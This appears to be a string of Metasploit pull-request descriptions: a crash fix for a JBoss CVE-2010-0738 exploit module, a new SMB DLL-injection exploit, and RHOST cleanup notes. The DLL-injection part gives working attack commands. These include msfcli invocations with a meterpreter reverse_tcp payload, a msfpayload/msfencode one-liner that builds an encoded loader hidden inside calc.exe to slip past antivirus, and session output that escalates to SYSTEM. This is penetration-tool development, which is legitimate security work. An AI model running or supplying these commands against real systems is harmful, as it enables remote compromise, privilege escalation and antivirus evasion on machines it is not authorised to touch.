The exploit against CVE-2010-0738 won't work when using GET or POST. In the existing code the request would fail and the function would return a nil. This would be passed to detect_platform without being checked and cause the module to crash ungracefully with the error:
Exploit failed: NoMethodError undefined method `body' for nil:NilClass
The first changes detect a 401 authentication message and provide useful feedback. Given that if, in any case, 'res' is not a valid or useful response the second change just terminates processing.
I've stayed with the module's coding style for consistency.
This is an implementation of using the SMBFileServer mixin to perform
DLL injection over SMB.
Exploitation can be performed by starting the dllinjector exploit
which will remain resident until a DLL is downloaded and a session
created. By generating an executable using the windows/loadlibrary
payload it is possible to test the SMBServer mixin on various platforms,
but also serves as a novel injection method where LoadLibrary calls are
not being filtered by Antivirus or EMET.
Example Run
```
# msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp SHARE=share DLL=exploit.dll LHOST=172.32.255.1 LPORT=4444 SRVHOST=172.32.255.1 E
[*] Initializing modules...
PAYLOAD => windows/meterpreter/reverse_tcp
SHARE => share
DLL => exploit.dll
LHOST => 172.32.255.1
LPORT => 4444
SRVHOST => 172.32.255.1
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious dll...
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.dll
[*] Sending stage (769536 bytes) to 172.32.255.128
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.128:1186) at 2014-04-24 11:18:55 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Reproduction Steps
* Generate dllinjector executable (non-malicious)
```
msfpayload windows/loadlibrary DLL="\\\\1.2.3.4\\share\\exploit.dll" R | msfencode -b '\x00' -t exe -x calc.exe -k -o dllinjector.exe -e x86/shikata_ga_nai -c 3
```
* Run DLL Injection server
```
msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=4444 SRVHOST=1.2.3.4 SHARE=share DLL=exploit.dll E
```
* Execute dllinjector.exe on the target host
* Monitor the generated traffic in Wireshark
* Enjoy shells.
Verification
Land #3074
Land #3075
Generate loadlibrary executable
Load dllinjector with payload
Run executable on target
Tested on:
Windows 7 (x86/x64)
Windows Server 2003
Windows Server 2008
There are three total, and they're all copy-pasted from the original
module from 2009. I suspect this idiom isn't used at all any more -- I
can't detect a difference in the payload if I just declare a host being
cli.peerhost, rather than rewriting RHOST to be cli.peerhost.
[SeeRM #8498]
This looks okay from debug (the host looks like it's generating okay)
but there may be some subtle thing I'm not seeing here. @wchen-r7 can
you glance at this please?
[SeeRM #8498]
xistence